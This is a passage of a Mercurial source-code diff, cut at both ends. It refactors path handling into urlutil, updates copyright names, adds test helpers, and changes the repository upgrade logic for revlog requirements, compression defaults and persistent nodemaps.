tmap[key] = os.path.join(base, val)
- aliases.extend(conf[b'templatealias'].items())
+ aliases.extend(conf.items(b'templatealias'))
return cache, tmap, aliases
--- a/mercurial/templateutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/templateutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# templateutil.py - utility for template evaluation
#
-# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/testing/__init__.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/testing/__init__.py Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,35 @@
+from __future__ import (
+ absolute_import,
+ division,
+)
+
+import os
+import time
+
+
+# work around check-code complains
+#
+# This is a simple log level module doing simple test related work, we can't
+# import more things, and we do not need it.
+environ = getattr(os, 'environ')
+
+
+def _timeout_factor():
+ """return the current modification to timeout"""
+ default = int(environ.get('HGTEST_TIMEOUT_DEFAULT', 1))
+ current = int(environ.get('HGTEST_TIMEOUT', default))
+ return current / float(default)
+
+
+def wait_file(path, timeout=10):
+ timeout *= _timeout_factor()
+ start = time.time()
+ while not os.path.exists(path):
+ if time.time() - start > timeout:
+ raise RuntimeError(b"timed out waiting for file: %s" % path)
+ time.sleep(0.01)
+
+
+def write_file(path, content=b''):
+ with open(path, 'wb') as f:
+ f.write(content)
--- a/mercurial/testing/storage.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/testing/storage.py Tue Apr 20 11:01:06 2021 -0400
@@ -1129,12 +1129,13 @@
with self._maketransactionfn() as tr:
nodes = []
- def onchangeset(cl, node):
+ def onchangeset(cl, rev):
+ node = cl.node(rev)
nodes.append(node)
cb(cl, node)
- def ondupchangeset(cl, node):
- nodes.append(node)
+ def ondupchangeset(cl, rev):
+ nodes.append(cl.node(rev))
f.addgroup(
[],
@@ -1157,18 +1158,19 @@
f = self._makefilefn()
deltas = [
- (node0, nullid, nullid, nullid, nullid, delta0, 0),
+ (node0, nullid, nullid, nullid, nullid, delta0, 0, {}),
]
with self._maketransactionfn() as tr:
nodes = []
- def onchangeset(cl, node):
+ def onchangeset(cl, rev):
+ node = cl.node(rev)
nodes.append(node)
cb(cl, node)
- def ondupchangeset(cl, node):
- nodes.append(node)
+ def ondupchangeset(cl, rev):
+ nodes.append(cl.node(rev))
f.addgroup(
deltas,
@@ -1212,13 +1214,15 @@
for i, fulltext in enumerate(fulltexts):
delta = mdiff.trivialdiffheader(len(fulltext)) + fulltext
- deltas.append((nodes[i], nullid, nullid, nullid, nullid, delta, 0))
+ deltas.append(
+ (nodes[i], nullid, nullid, nullid, nullid, delta, 0, {})
+ )
with self._maketransactionfn() as tr:
newnodes = []
- def onchangeset(cl, node):
- newnodes.append(node)
+ def onchangeset(cl, rev):
+ newnodes.append(cl.node(rev))
f.addgroup(
deltas,
@@ -1260,7 +1264,9 @@
)
delta = mdiff.textdiff(b'bar\n' * 30, (b'bar\n' * 30) + b'baz\n')
- deltas = [(b'\xcc' * 20, node1, nullid, b'\x01' * 20, node1, delta, 0)]
+ deltas = [
+ (b'\xcc' * 20, node1, nullid, b'\x01' * 20, node1, delta, 0, {})
+ ]
with self._maketransactionfn() as tr:
with self.assertRaises(error.CensoredBaseError):
--- a/mercurial/transaction.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/transaction.py Tue Apr 20 11:01:06 2021 -0400
@@ -6,7 +6,7 @@
# effectively log-structured, this should amount to simply truncating
# anything that isn't referenced in the changelog.
#
-# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/treediscovery.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/treediscovery.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# discovery.py - protocol changeset discovery functions
#
-# Copyright 2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/ui.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/ui.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# ui.py - user interface bits for mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -26,7 +26,6 @@
from .pycompat import (
getattr,
open,
- setattr,
)
from . import (
@@ -48,6 +47,7 @@
procutil,
resourceutil,
stringutil,
+ urlutil,
)
urlreq = util.urlreq
@@ -302,6 +302,11 @@
if k in self.environ:
self._exportableenviron[k] = self.environ[k]
+ def _new_source(self):
+ self._ocfg.new_source()
+ self._tcfg.new_source()
+ self._ucfg.new_source()
+
@classmethod
def load(cls):
"""Create a ui and load global and user configs"""
@@ -313,6 +318,7 @@
elif t == b'resource':
u.read_resource_config(f, trust=True)
elif t == b'items':
+ u._new_source()
sections = set()
for section, name, value, source in f:
# do not set u._ocfg
@@ -325,6 +331,7 @@
else:
raise error.ProgrammingError(b'unknown rctype: %s' % t)
u._maybetweakdefaults()
+ u._new_source() # anything after that is a different level
return u
def _maybetweakdefaults(self):
@@ -552,9 +559,9 @@
)
p = p.replace(b'%%', b'%')
p = util.expandpath(p)
- if not util.hasscheme(p) and not os.path.isabs(p):
+ if not urlutil.hasscheme(p) and not os.path.isabs(p):
p = os.path.normpath(os.path.join(root, p))
- c.set(b"paths", n, p)
+ c.alter(b"paths", n, p)
if section in (None, b'ui'):
# update ui options
@@ -655,11 +662,18 @@
msg %= (section, name, pycompat.bytestr(default))
self.develwarn(msg, 2, b'warn-config-default')
+ candidates = []
+ config = self._data(untrusted)
for s, n in alternates:
- candidate = self._data(untrusted).get(s, n, None)
+ candidate = config.get(s, n, None)
if candidate is not None:
- value = candidate
- break
+ candidates.append((s, n, candidate))
+ if candidates:
+
+ def level(x):
+ return config.level(x[0], x[1])
+
+ value = max(candidates, key=level)[2]
if self.debugflag and not untrusted and self._reportuntrusted:
for s, n in alternates:
@@ -1016,8 +1030,10 @@
def expandpath(self, loc, default=None):
"""Return repository location relative to cwd or from [paths]"""
+ msg = b'ui.expandpath is deprecated, use `get_*` functions from urlutil'
+ self.deprecwarn(msg, b'6.0')
try:
- p = self.paths.getpath(loc)
+ p = self.getpath(loc)
if p:
return p.rawloc
except error.RepoError:
@@ -1025,7 +1041,7 @@
if default:
try:
- p = self.paths.getpath(default)
+ p = self.getpath(default)
if p:
return p.rawloc
except error.RepoError:
@@ -1035,7 +1051,14 @@
@util.propertycache
def paths(self):
- return paths(self)
+ return urlutil.paths(self)
+
+ def getpath(self, *args, **kwargs):
+ """see paths.getpath for details
+
+ This method exist as `getpath` need a ui for potential warning message.
+ """
+ return self.paths.getpath(self, *args, **kwargs)
@property
def fout(self):
@@ -2159,192 +2182,6 @@
return util._estimatememory()
-class paths(dict):
- """Represents a collection of paths and their configs.
-
- Data is initially derived from ui instances and the config files they have
- loaded.
- """
-
- def __init__(self, ui):
- dict.__init__(self)
-
- for name, loc in ui.configitems(b'paths', ignoresub=True):
- # No location is the same as not existing.
- if not loc:
- continue
- loc, sub = ui.configsuboptions(b'paths', name)
- self[name] = path(ui, name, rawloc=loc, suboptions=sub)
-
- def getpath(self, name, default=None):
- """Return a ``path`` from a string, falling back to default.
-
- ``name`` can be a named path or locations. Locations are filesystem
- paths or URIs.
-
- Returns None if ``name`` is not a registered path, a URI, or a local
- path to a repo.
- """
- # Only fall back to default if no path was requested.
- if name is None:
- if not default:
- default = ()
- elif not isinstance(default, (tuple, list)):
- default = (default,)
- for k in default:
- try:
- return self[k]
- except KeyError:
- continue
- return None
-
- # Most likely empty string.
- # This may need to raise in the future.
- if not name:
- return None
-
- try:
- return self[name]
- except KeyError:
- # Try to resolve as a local path or URI.
- try:
- # We don't pass sub-options in, so no need to pass ui instance.
- return path(None, None, rawloc=name)
- except ValueError:
- raise error.RepoError(_(b'repository %s does not exist') % name)
-
-
-_pathsuboptions = {}
-
-
-def pathsuboption(option, attr):
- """Decorator used to declare a path sub-option.
-
- Arguments are the sub-option name and the attribute it should set on
- ``path`` instances.
-
- The decorated function will receive as arguments a ``ui`` instance,
- ``path`` instance, and the string value of this option from the config.
- The function should return the value that will be set on the ``path``
- instance.
-
- This decorator can be used to perform additional verification of
- sub-options and to change the type of sub-options.
- """
-
- def register(func):
- _pathsuboptions[option] = (attr, func)
- return func
-
- return register
-
-
-@pathsuboption(b'pushurl', b'pushloc')
-def pushurlpathoption(ui, path, value):
- u = util.url(value)
- # Actually require a URL.
- if not u.scheme:
- ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
- return None
-
- # Don't support the #foo syntax in the push URL to declare branch to
- # push.
- if u.fragment:
- ui.warn(
- _(
- b'("#fragment" in paths.%s:pushurl not supported; '
- b'ignoring)\n'
- )
- % path.name
- )
- u.fragment = None
-
- return bytes(u)
-
-
-@pathsuboption(b'pushrev', b'pushrev')
-def pushrevpathoption(ui, path, value):
- return value
-
-
-class path(object):
- """Represents an individual path and its configuration."""
-
- def __init__(self, ui, name, rawloc=None, suboptions=None):
- """Construct a path from its config options.
-
- ``ui`` is the ``ui`` instance the path is coming from.
- ``name`` is the symbolic name of the path.
- ``rawloc`` is the raw location, as defined in the config.
- ``pushloc`` is the raw locations pushes should be made to.
-
- If ``name`` is not defined, we require that the location be a) a local
- filesystem path with a .hg directory or b) a URL. If not,
- ``ValueError`` is raised.
- """
- if not rawloc:
- raise ValueError(b'rawloc must be defined')
-
- # Locations may define branches via syntax <base>#<branch>.
- u = util.url(rawloc)
- branch = None
- if u.fragment:
- branch = u.fragment
- u.fragment = None
-
- self.url = u
- self.branch = branch
-
- self.name = name
- self.rawloc = rawloc
- self.loc = b'%s' % u
-
- # When given a raw location but not a symbolic name, validate the
- # location is valid.
- if not name and not u.scheme and not self._isvalidlocalpath(self.loc):
- raise ValueError(
- b'location is not a URL or path to a local '
- b'repo: %s' % rawloc
- )
-
- suboptions = suboptions or {}
-
- # Now process the sub-options. If a sub-option is registered, its
- # attribute will always be present. The value will be None if there
- # was no valid sub-option.
- for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions):
- if suboption not in suboptions:
- setattr(self, attr, None)
- continue
-
- value = func(ui, self, suboptions[suboption])
- setattr(self, attr, value)
-
- def _isvalidlocalpath(self, path):
- """Returns True if the given path is a potentially valid repository.
- This is its own function so that extensions can change the definition of
- 'valid' in this case (like when pulling from a git repo into a hg
- one)."""
- try:
- return os.path.isdir(os.path.join(path, b'.hg'))
- # Python 2 may return TypeError. Python 3, ValueError.
- except (TypeError, ValueError):
- return False
-
- @property
- def suboptions(self):
- """Return sub-options and their values for this path.
-
- This is intended to be used for presentation purposes.
- """
- d = {}
- for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions):
- value = getattr(self, attr)
- if value is not None:
- d[subopt] = value
- return d
-
-
# we instantiate one globally shared progress bar to avoid
# competing progress bars when multiple UI objects get created
_progresssingleton = None
--- a/mercurial/unionrepo.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/unionrepo.py Tue Apr 20 11:01:06 2021 -0400
@@ -128,6 +128,7 @@
deltas,
linkmapper,
transaction,
+ alwayscache=False,
addrevisioncb=None,
duplicaterevisioncb=None,
maybemissingparents=False,
@@ -152,9 +153,9 @@
class unionmanifest(unionrevlog, manifest.manifestrevlog):
- def __init__(self, opener, opener2, linkmapper):
- manifest.manifestrevlog.__init__(self, opener)
- manifest2 = manifest.manifestrevlog(opener2)
+ def __init__(self, nodeconstants, opener, opener2, linkmapper):
+ manifest.manifestrevlog.__init__(self, nodeconstants, opener)
+ manifest2 = manifest.manifestrevlog(nodeconstants, opener2)
unionrevlog.__init__(
self, opener, self.indexfile, manifest2, linkmapper
)
@@ -204,7 +205,10 @@
@localrepo.unfilteredpropertycache
def manifestlog(self):
rootstore = unionmanifest(
- self.svfs, self.repo2.svfs, self.unfiltered()._clrev
+ self.nodeconstants,
+ self.svfs,
+ self.repo2.svfs,
+ self.unfiltered()._clrev,
)
return manifest.manifestlog(
self.svfs, self, rootstore, self.narrowmatch()
--- a/mercurial/upgrade.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/upgrade.py Tue Apr 20 11:01:06 2021 -0400
@@ -118,6 +118,7 @@
up_actions,
removed_actions,
revlogs,
+ backup,
)
if not run:
@@ -215,12 +216,6 @@
backuppath = upgrade_engine.upgrade(
ui, repo, dstrepo, upgrade_op
)
- if not backup:
- ui.status(
- _(b'removing old repository content %s\n') % backuppath
- )
- repo.vfs.rmtree(backuppath, forcibly=True)
- backuppath = None
finally:
ui.status(_(b'removing temporary repository %s\n') % tmppath)
--- a/mercurial/upgrade_utils/actions.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/upgrade_utils/actions.py Tue Apr 20 11:01:06 2021 -0400
@@ -23,7 +23,7 @@
# list of requirements that request a clone of all revlog if added/removed
RECLONES_REQUIREMENTS = {
- b'generaldelta',
+ requirements.GENERALDELTA_REQUIREMENT,
requirements.SPARSEREVLOG_REQUIREMENT,
}
@@ -69,6 +69,18 @@
postdowngrademessage
Message intended for humans which will be shown post an upgrade
operation in which this improvement was removed
+
+ touches_filelogs (bool)
+ Whether this improvement touches filelogs
+
+ touches_manifests (bool)
+ Whether this improvement touches manifests
+
+ touches_changelog (bool)
+ Whether this improvement touches changelog
+
+ touches_requirements (bool)
+ Whether this improvement changes repository requirements
"""
def __init__(self, name, type, description, upgrademessage):
@@ -78,6 +90,12 @@
self.upgrademessage = upgrademessage
self.postupgrademessage = None
self.postdowngrademessage = None
+ # By default for now, we assume every improvement touches
+ # all the things
+ self.touches_filelogs = True
+ self.touches_manifests = True
+ self.touches_changelog = True
+ self.touches_requirements = True
def __eq__(self, other):
if not isinstance(other, improvement):
@@ -131,6 +149,12 @@
# operation in which this improvement was removed
postdowngrademessage = None
+ # By default for now, we assume every improvement touches all the things
+ touches_filelogs = True
+ touches_manifests = True
+ touches_changelog = True
+ touches_requirements = True
+
def __init__(self):
raise NotImplementedError()
@@ -176,7 +200,7 @@
class fncache(requirementformatvariant):
name = b'fncache'
- _requirement = b'fncache'
+ _requirement = requirements.FNCACHE_REQUIREMENT
default = True
@@ -196,7 +220,7 @@
class dotencode(requirementformatvariant):
name = b'dotencode'
- _requirement = b'dotencode'
+ _requirement = requirements.DOTENCODE_REQUIREMENT
default = True
@@ -215,7 +239,7 @@
class generaldelta(requirementformatvariant):
name = b'generaldelta'
- _requirement = b'generaldelta'
+ _requirement = requirements.GENERALDELTA_REQUIREMENT
default = True
@@ -270,6 +294,12 @@
b' New shares will be created in safe mode.'
)
+ # upgrade only needs to change the requirements
+ touches_filelogs = False
+ touches_manifests = False
+ touches_changelog = False
+ touches_requirements = True
+
@registerformatvariant
class sparserevlog(requirementformatvariant):
@@ -298,22 +328,6 @@
@registerformatvariant
-class sidedata(requirementformatvariant):
- name = b'sidedata'
-
- _requirement = requirements.SIDEDATA_REQUIREMENT
-
- default = False
-
- description = _(
- b'Allows storage of extra data alongside a revision, '
- b'unlocking various caching options.'
- )
-
- upgrademessage = _(b'Allows storage of extra data alongside a revision.')
-
-
-@registerformatvariant
class persistentnodemap(requirementformatvariant):
name = b'persistent-nodemap'
@@ -344,6 +358,15 @@
@registerformatvariant
+class revlogv2(requirementformatvariant):
+ name = b'revlog-v2'
+ _requirement = requirements.REVLOGV2_REQUIREMENT
+ default = False
+ description = _(b'Version 2 of the revlog.')
+ upgrademessage = _(b'very experimental')
+
+
+@registerformatvariant
class removecldeltachain(formatvariant):
name = b'plain-cl-delta'
@@ -375,10 +398,21 @@
return True
+_has_zstd = (
+ b'zstd' in util.compengines
+ and util.compengines[b'zstd'].available()
+ and util.compengines[b'zstd'].revlogheader()
+)
+
+
@registerformatvariant
class compressionengine(formatvariant):
name = b'compression'
- default = b'zlib'
+
+ if _has_zstd:
+ default = b'zstd'
+ else:
+ default = b'zlib'
description = _(
b'Compresion algorithm used to compress data. '
@@ -408,7 +442,9 @@
# return the first valid value as the selection code would do
for comp in compengines:
if comp in util.compengines:
- return comp
+ e = util.compengines[comp]
+ if e.available() and e.revlogheader():
+ return comp
# no valide compression found lets display it all for clarity
return b','.join(compengines)
@@ -629,6 +665,7 @@
upgrade_actions,
removed_actions,
revlogs_to_process,
+ backup_store,
):
self.ui = ui
self.new_requirements = new_requirements
@@ -673,6 +710,75 @@
b're-delta-multibase' in self._upgrade_actions_names
)
+ # should this operation create a backup of the store
+ self.backup_store = backup_store
+
+ # whether the operation touches different revlogs at all or not
+ self.touches_filelogs = self._touches_filelogs()
+ self.touches_manifests = self._touches_manifests()
+ self.touches_changelog = self._touches_changelog()
+ # whether the operation touches requirements file or not
+ self.touches_requirements = self._touches_requirements()
+ self.touches_store = (
+ self.touches_filelogs
+ or self.touches_manifests
+ or self.touches_changelog
+ )
+ # does the operation only touches repository requirement
+ self.requirements_only = (
+ self.touches_requirements and not self.touches_store
+ )
+
+ def _touches_filelogs(self):
+ for a in self.upgrade_actions:
+ # in optimisations, we re-process the revlogs again
+ if a.type == OPTIMISATION:
+ return True
+ elif a.touches_filelogs:
+ return True
+ for a in self.removed_actions:
+ if a.touches_filelogs:
+ return True
+ return False
+
+ def _touches_manifests(self):
+ for a in self.upgrade_actions:
+ # in optimisations, we re-process the revlogs again
+ if a.type == OPTIMISATION:
+ return True
+ elif a.touches_manifests:
+ return True
+ for a in self.removed_actions:
+ if a.touches_manifests:
+ return True
+ return False
+
+ def _touches_changelog(self):
+ for a in self.upgrade_actions:
+ # in optimisations, we re-process the revlogs again
+ if a.type == OPTIMISATION:
+ return True
+ elif a.touches_changelog:
+ return True
+ for a in self.removed_actions:
+ if a.touches_changelog:
+ return True
+ return False
+
+ def _touches_requirements(self):
+ for a in self.upgrade_actions:
+ # optimisations are used to re-process revlogs and does not result
+ # in a requirement being added or removed
+ if a.type == OPTIMISATION:
+ pass
+ elif a.touches_requirements:
+ return True
+ for a in self.removed_actions:
+ if a.touches_requirements:
+ return True
+
+ return False
+
def _write_labeled(self, l, label):
"""
Utility function to aid writing of a list under one label
@@ -760,9 +866,7 @@
"""
return {
# Introduced in Mercurial 0.9.2.
- b'revlogv1',
- # Introduced in Mercurial 0.9.2.
- b'store',
+ requirements.STORE_REQUIREMENT,
}
@@ -784,9 +888,21 @@
}
+def check_revlog_version(reqs):
+ """Check that the requirements contain at least one Revlog version"""
+ all_revlogs = {
+ requirements.REVLOGV1_REQUIREMENT,
+ requirements.REVLOGV2_REQUIREMENT,
+ }
+ if not all_revlogs.intersection(reqs):
+ msg = _(b'cannot upgrade repository; missing a revlog version')
+ raise error.Abort(msg)
+
+
def check_source_requirements(repo):
"""Ensure that no existing requirements prevent the repository upgrade"""
+ check_revlog_version(repo.requirements)
required = requiredsourcerequirements(repo)
missingreqs = required - repo.requirements
if missingreqs:
@@ -818,6 +934,8 @@
requirements.COPIESSDC_REQUIREMENT,
requirements.NODEMAP_REQUIREMENT,
requirements.SHARESAFE_REQUIREMENT,
+ requirements.REVLOGV2_REQUIREMENT,
+ requirements.REVLOGV1_REQUIREMENT,
}
for name in compression.compengines:
engine = compression.compengines[name]
@@ -837,16 +955,17 @@
Extensions should monkeypatch this to add their custom requirements.
"""
supported = {
- b'dotencode',
- b'fncache',
- b'generaldelta',
- b'revlogv1',
- b'store',
+ requirements.DOTENCODE_REQUIREMENT,
+ requirements.FNCACHE_REQUIREMENT,
+ requirements.GENERALDELTA_REQUIREMENT,
+ requirements.REVLOGV1_REQUIREMENT, # allowed in case of downgrade
+ requirements.STORE_REQUIREMENT,
requirements.SPARSEREVLOG_REQUIREMENT,
requirements.SIDEDATA_REQUIREMENT,
requirements.COPIESSDC_REQUIREMENT,
requirements.NODEMAP_REQUIREMENT,
requirements.SHARESAFE_REQUIREMENT,
+ requirements.REVLOGV2_REQUIREMENT,
}
for name in compression.compengines:
engine = compression.compengines[name]
@@ -868,14 +987,16 @@
future, unknown requirements from accidentally being added.
"""
supported = {
- b'dotencode',
- b'fncache',
- b'generaldelta',
+ requirements.DOTENCODE_REQUIREMENT,
+ requirements.FNCACHE_REQUIREMENT,
+ requirements.GENERALDELTA_REQUIREMENT,
requirements.SPARSEREVLOG_REQUIREMENT,
requirements.SIDEDATA_REQUIREMENT,
requirements.COPIESSDC_REQUIREMENT,
requirements.NODEMAP_REQUIREMENT,
requirements.SHARESAFE_REQUIREMENT,
+ requirements.REVLOGV1_REQUIREMENT,
+ requirements.REVLOGV2_REQUIREMENT,
}
for name in compression.compengines:
engine = compression.compengines[name]
@@ -888,7 +1009,7 @@
def check_requirements_changes(repo, new_reqs):
old_reqs = repo.requirements
-
+ check_revlog_version(repo.requirements)
support_removal = supportremovedrequirements(repo)
no_remove_reqs = old_reqs - new_reqs - support_removal
if no_remove_reqs:
--- a/mercurial/upgrade_utils/engine.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/upgrade_utils/engine.py Tue Apr 20 11:01:06 2021 -0400
@@ -21,27 +21,34 @@
requirements,
revlog,
scmutil,
+ store,
util,
vfs as vfsmod,
)
+from ..revlogutils import nodemap
-def _revlogfrompath(repo, path):
+def _revlogfrompath(repo, rl_type, path):
"""Obtain a revlog from a repo path.
An instance of the appropriate class is returned.
"""
- if path == b'00changelog.i':
+ if rl_type & store.FILEFLAGS_CHANGELOG:
return changelog.changelog(repo.svfs)
- elif path.endswith(b'00manifest.i'):
- mandir = path[: -len(b'00manifest.i')]
- return manifest.manifestrevlog(repo.svfs, tree=mandir)
+ elif rl_type & store.FILEFLAGS_MANIFESTLOG:
+ mandir = b''
+ if b'/' in path:
+ mandir = path.rsplit(b'/', 1)[0]
+ return manifest.manifestrevlog(
+ repo.nodeconstants, repo.svfs, tree=mandir
+ )
else:
- # reverse of "/".join(("data", path + ".i"))
- return filelog.filelog(repo.svfs, path[5:-2])
+ # drop the extension and the `data/` prefix
+ path = path.rsplit(b'.', 1)[0].split(b'/', 1)[1]
+ return filelog.filelog(repo.svfs, path)
-def _copyrevlog(tr, destrepo, oldrl, unencodedname):
+def _copyrevlog(tr, destrepo, oldrl, rl_type, unencodedname):
"""copy all relevant files for `oldrl` into `destrepo` store
Files are copied "as is" without any transformation. The copy is performed
@@ -49,7 +56,7 @@
content is compatible with format of the destination repository.
"""
oldrl = getattr(oldrl, '_revlog', oldrl)
- newrl = _revlogfrompath(destrepo, unencodedname)
+ newrl = _revlogfrompath(destrepo, rl_type, unencodedname)
newrl = getattr(newrl, '_revlog', newrl)
oldvfs = oldrl.opener
@@ -67,10 +74,7 @@
if copydata:
util.copyfile(olddata, newdata)
- if not (
- unencodedname.endswith(b'00changelog.i')
- or unencodedname.endswith(b'00manifest.i')
- ):
+ if rl_type & store.FILEFLAGS_FILELOG:
destrepo.svfs.fncache.add(unencodedname)
if copydata:
destrepo.svfs.fncache.add(unencodedname[:-2] + b'.d')
@@ -104,17 +108,18 @@
return sidedatacompanion
-def matchrevlog(revlogfilter, entry):
+def matchrevlog(revlogfilter, rl_type):
"""check if a revlog is selected for cloning.
In other words, are there any updates which need to be done on revlog
or it can be blindly copied.
The store entry is checked against the passed filter"""
- if entry.endswith(b'00changelog.i'):
+ if rl_type & store.FILEFLAGS_CHANGELOG:
return UPGRADE_CHANGELOG in revlogfilter
- elif entry.endswith(b'00manifest.i'):
+ elif rl_type & store.FILEFLAGS_MANIFESTLOG:
return UPGRADE_MANIFEST in revlogfilter
+ assert rl_type & store.FILEFLAGS_FILELOG
return UPGRADE_FILELOGS in revlogfilter
@@ -123,6 +128,7 @@
dstrepo,
tr,
old_revlog,
+ rl_type,
unencoded,
upgrade_op,
sidedatacompanion,
@@ -130,11 +136,11 @@
):
""" returns the new revlog object created"""
newrl = None
- if matchrevlog(upgrade_op.revlogs_to_process, unencoded):
+ if matchrevlog(upgrade_op.revlogs_to_process, rl_type):
ui.note(
_(b'cloning %d revisions from %s\n') % (len(old_revlog), unencoded)
)
- newrl = _revlogfrompath(dstrepo, unencoded)
+ newrl = _revlogfrompath(dstrepo, rl_type, unencoded)
old_revlog.clone(
tr,
newrl,
@@ -146,9 +152,9 @@
else:
msg = _(b'blindly copying %s containing %i revisions\n')
ui.note(msg % (unencoded, len(old_revlog)))
- _copyrevlog(tr, dstrepo, old_revlog, unencoded)
+ _copyrevlog(tr, dstrepo, old_revlog, rl_type, unencoded)
- newrl = _revlogfrompath(dstrepo, unencoded)
+ newrl = _revlogfrompath(dstrepo, rl_type, unencoded)
return newrl
@@ -189,11 +195,11 @@
# Perform a pass to collect metadata. This validates we can open all
# source files and allows a unified progress bar to be displayed.
- for unencoded, encoded, size in alldatafiles:
- if not unencoded.endswith(b'.i'):
+ for rl_type, unencoded, encoded, size in alldatafiles:
+ if not rl_type & store.FILEFLAGS_REVLOG_MAIN:
continue
- rl = _revlogfrompath(srcrepo, unencoded)
+ rl = _revlogfrompath(srcrepo, rl_type, unencoded)
info = rl.storageinfo(
exclusivefiles=True,
@@ -210,19 +216,19 @@
srcrawsize += rawsize
# This is for the separate progress bars.
- if isinstance(rl, changelog.changelog):
- changelogs[unencoded] = rl
+ if rl_type & store.FILEFLAGS_CHANGELOG:
+ changelogs[unencoded] = (rl_type, rl)
crevcount += len(rl)
csrcsize += datasize
crawsize += rawsize
- elif isinstance(rl, manifest.manifestrevlog):
- manifests[unencoded] = rl
+ elif rl_type & store.FILEFLAGS_MANIFESTLOG:
+ manifests[unencoded] = (rl_type, rl)
mcount += 1
mrevcount += len(rl)
msrcsize += datasize
mrawsize += rawsize
- elif isinstance(rl, filelog.filelog):
- filelogs[unencoded] = rl
+ elif rl_type & store.FILEFLAGS_FILELOG:
+ filelogs[unencoded] = (rl_type, rl)
fcount += 1
frevcount += len(rl)
fsrcsize += datasize
@@ -267,12 +273,13 @@
)
)
progress = srcrepo.ui.makeprogress(_(b'file revisions'), total=frevcount)
- for unencoded, oldrl in sorted(filelogs.items()):
+ for unencoded, (rl_type, oldrl) in sorted(filelogs.items()):
newrl = _perform_clone(
ui,
dstrepo,
tr,
oldrl,
+ rl_type,
unencoded,
upgrade_op,
sidedatacompanion,
@@ -306,12 +313,13 @@
progress = srcrepo.ui.makeprogress(
_(b'manifest revisions'), total=mrevcount
)
- for unencoded, oldrl in sorted(manifests.items()):
+ for unencoded, (rl_type, oldrl) in sorted(manifests.items()):
newrl = _perform_clone(
ui,
dstrepo,
tr,
oldrl,
+ rl_type,
unencoded,
upgrade_op,
sidedatacompanion,
@@ -344,12 +352,13 @@
progress = srcrepo.ui.makeprogress(
_(b'changelog revisions'), total=crevcount
)
- for unencoded, oldrl in sorted(changelogs.items()):
+ for unencoded, (rl_type, oldrl) in sorted(changelogs.items()):
newrl = _perform_clone(
ui,
dstrepo,
tr,
oldrl,
+ rl_type,
unencoded,
upgrade_op,
sidedatacompanion,
@@ -381,7 +390,7 @@
are cloned"""
for path, kind, st in sorted(srcrepo.store.vfs.readdir(b'', stat=True)):
# don't copy revlogs as they are already cloned
- if path.endswith((b'.i', b'.d', b'.n', b'.nd')):
+ if store.revlog_type(path) is not None:
continue
# Skip transaction related files.
if path.startswith(b'undo'):
@@ -412,7 +421,10 @@
"""
# TODO: don't blindly rename everything in store
# There can be upgrades where store is not touched at all
- util.rename(currentrepo.spath, backupvfs.join(b'store'))
+ if upgrade_op.backup_store:
+ util.rename(currentrepo.spath, backupvfs.join(b'store'))
+ else:
+ currentrepo.vfs.rmtree(b'store', forcibly=True)
util.rename(upgradedrepo.spath, currentrepo.spath)
@@ -436,6 +448,8 @@
"""
assert srcrepo.currentwlock()
assert dstrepo.currentwlock()
+ backuppath = None
+ backupvfs = None
ui.status(
_(
@@ -444,79 +458,136 @@
)
)
- with dstrepo.transaction(b'upgrade') as tr:
- _clonerevlogs(
- ui,
- srcrepo,
- dstrepo,
- tr,
- upgrade_op,
+ if upgrade_op.requirements_only:
+ ui.status(_(b'upgrading repository requirements\n'))
+ scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements)
+ # if there is only one action and that is persistent nodemap upgrade
+ # directly write the nodemap file and update requirements instead of going
+ # through the whole cloning process
+ elif (
+ len(upgrade_op.upgrade_actions) == 1
+ and b'persistent-nodemap' in upgrade_op._upgrade_actions_names
+ and not upgrade_op.removed_actions
+ ):
+ ui.status(
+ _(b'upgrading repository to use persistent nodemap feature\n')
+ )
+ with srcrepo.transaction(b'upgrade') as tr:
+ unfi = srcrepo.unfiltered()
+ cl = unfi.changelog
+ nodemap.persist_nodemap(tr, cl, force=True)
+ # we want to directly operate on the underlying revlog to force
+ # create a nodemap file. This is fine since this is upgrade code
+ # and it heavily relies on repository being revlog based
+ # hence accessing private attributes can be justified
+ nodemap.persist_nodemap(
+ tr, unfi.manifestlog._rootstore._revlog, force=True
+ )
+ scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements)
+ elif (
+ len(upgrade_op.removed_actions) == 1
+ and [
+ x
+ for x in upgrade_op.removed_actions
+ if x.name == b'persistent-nodemap'
+ ]
+ and not upgrade_op.upgrade_actions
+ ):
+ ui.status(
+ _(b'downgrading repository to not use persistent nodemap feature\n')
+ )
+ with srcrepo.transaction(b'upgrade') as tr:
+ unfi = srcrepo.unfiltered()
+ cl = unfi.changelog
+ nodemap.delete_nodemap(tr, srcrepo, cl)
+ # check comment 20 lines above for accessing private attributes
+ nodemap.delete_nodemap(
